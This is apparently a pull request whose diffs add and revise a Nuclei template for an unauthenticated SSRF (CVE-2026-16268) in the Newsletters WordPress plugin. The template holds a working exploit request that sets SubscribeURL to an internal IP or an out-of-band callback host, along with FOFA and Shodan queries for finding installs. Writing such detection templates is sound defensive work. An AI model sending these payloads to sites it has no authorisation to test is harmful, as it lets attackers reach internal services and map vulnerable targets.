### PR TITLE
Add CVE-2026-16268 template

### DIFF
--- a/http/cves/2026/CVE-2026-16268.yaml
+++ b/http/cves/2026/CVE-2026-16268.yaml
@@ -1,24 +1,15 @@
 id: CVE-2026-16268
 
 info:
-  name: Newsletters (newsletters-lite) < 4.16 - Unauthenticated SSRF via SNS Bounce Handler
+  name: Newsletters < 4.16 - Unauthenticated SSRF via SNS Bounce Handler
   author: str4k3r
   severity: medium
   description: |
-    Newsletters (newsletters-lite) < 4.16 contains a server-side request
-    forgery caused by the Amazon SNS bounce-processing handler
-    (?wpmlmethod=bounce&type=sns) calling wp_remote_request() on the
-    attacker-supplied SubscribeURL field of a SubscriptionConfirmation
-    message with no signature verification and no host/scheme allowlist,
-    letting an unauthenticated attacker make the site issue requests to
-    arbitrary internal or external hosts. Fixed in 4.16, which validates
-    the SNS message signature and the target URL before switching to
-    wp_safe_remote_request().
+    Newsletters WordPress plugin < 4.16 contains a server-side request forgery caused by lack of authentication and validation in bounce-processing requests, letting unauthenticated attackers make arbitrary requests to internal or external hosts.
   impact: |
-    Unauthenticated attackers can make the server issue requests to
-    internal-only network services and loopback addresses, potentially
-    exposing internal infrastructure or cloud metadata endpoints.
-  remediation: Upgrade Newsletters (newsletters-lite) to version 4.16 or later.
+    Unauthenticated attackers can make the server send requests to arbitrary hosts, potentially leading to internal network scanning or interaction with unintended services.
+  remediation: |
+    Update to version 4.16 or later.
   reference:
     - https://wpscan.com/vulnerability/65612dd4-83d8-40c5-8e12-862e9b5f940b/
     - https://nvd.nist.gov/vuln/detail/CVE-2026-16268
@@ -29,11 +20,13 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
   metadata:
     verified: true
-    verification_status: VERIFIED
     max-request: 1
     vendor: newsletters-lite
     product: newsletters-lite
-  tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,blind
+    framework: wordpress
+    fofa-query: body="/wp-content/plugins/newsletters-lite/"
+    shodan-query: http.html:"/wp-content/plugins/newsletters-lite/"
+  tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,oast
 
 http:
   - raw:
@@ -42,11 +35,11 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"Type":"SubscriptionConfirmation","SubscribeURL":"http://10.255.255.1:9999/{{randstr}}","Message":"{}"}
+        {"Type":"SubscriptionConfirmation","SubscribeURL":"http://{{interactsh-url}}/nuclei-ssrf-probe","Message":"{}"}
 
     matchers:
       - type: dsl
         dsl:
-          - "status_code == 200"
-          - "duration >= 3"
+          - 'status_code == 200'
+          - 'contains(interactsh_protocol, "http")'
         condition: and

--- a/http/cves/2026/CVE-2026-16268.yaml
+++ b/http/cves/2026/CVE-2026-16268.yaml
@@ -1,0 +1,52 @@
+id: CVE-2026-16268
+
+info:
+  name: Newsletters (newsletters-lite) < 4.16 - Unauthenticated SSRF via SNS Bounce Handler
+  author: str4k3r
+  severity: medium
+  description: |
+    Newsletters (newsletters-lite) < 4.16 contains a server-side request
+    forgery caused by the Amazon SNS bounce-processing handler
+    (?wpmlmethod=bounce&type=sns) calling wp_remote_request() on the
+    attacker-supplied SubscribeURL field of a SubscriptionConfirmation
+    message with no signature verification and no host/scheme allowlist,
+    letting an unauthenticated attacker make the site issue requests to
+    arbitrary internal or external hosts. Fixed in 4.16, which validates
+    the SNS message signature and the target URL before switching to
+    wp_safe_remote_request().
+  impact: |
+    Unauthenticated attackers can make the server issue requests to
+    internal-only network services and loopback addresses, potentially
+    exposing internal infrastructure or cloud metadata endpoints.
+  remediation: Upgrade Newsletters (newsletters-lite) to version 4.16 or later.
+  reference:
+    - https://wpscan.com/vulnerability/65612dd4-83d8-40c5-8e12-862e9b5f940b/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-16268
+  classification:
+    cve-id: CVE-2026-16268
+    cwe-id: CWE-918
+    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+  metadata:
+    verified: true
+    verification_status: VERIFIED
+    max-request: 1
+    vendor: newsletters-lite
+    product: newsletters-lite
+  tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,blind
+
+http:
+  - raw:
+      - |
+        POST /?wpmlmethod=bounce&type=sns HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"Type":"SubscriptionConfirmation","SubscribeURL":"http://10.255.255.1:9999/{{randstr}}","Message":"{}"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "duration >= 3"
+        condition: and

--- a/http/cves/2026/CVE-2026-16268.yaml
+++ b/http/cves/2026/CVE-2026-16268.yaml
@@ -29,13 +29,13 @@ info:
   tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,oast
 
 flow: http(1) && http(2)
- 
+
 http:
   - raw:
       - |
         GET /wp-content/plugins/newsletters-lite/readme.txt HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers:
       - type: dsl
         dsl:
@@ -43,15 +43,15 @@ http:
           - 'contains_all(body, "Newsletters", "newsletters")'
         condition: and
         internal: true
- 
+
   - raw:
       - |
         POST /?wpmlmethod=bounce&type=sns HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
- 
+
         {"Type":"SubscriptionConfirmation","SubscribeURL":"http://{{interactsh-url}}/nuclei-ssrf-probe","Message":"{}"}
- 
+
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2026/CVE-2026-16268.yaml
+++ b/http/cves/2026/CVE-2026-16268.yaml
@@ -28,15 +28,30 @@ info:
     shodan-query: http.html:"/wp-content/plugins/newsletters-lite/"
   tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,oast
 
+flow: http(1) && http(2)
+ 
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/newsletters-lite/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+ 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "Newsletters", "newsletters")'
+        condition: and
+        internal: true
+ 
   - raw:
       - |
         POST /?wpmlmethod=bounce&type=sns HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-
+ 
         {"Type":"SubscriptionConfirmation","SubscribeURL":"http://{{interactsh-url}}/nuclei-ssrf-probe","Message":"{}"}
-
+ 
     matchers:
       - type: dsl
         dsl:


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-16268** as an ecosystem contribution.
The template follows the repository format and references the public advisory.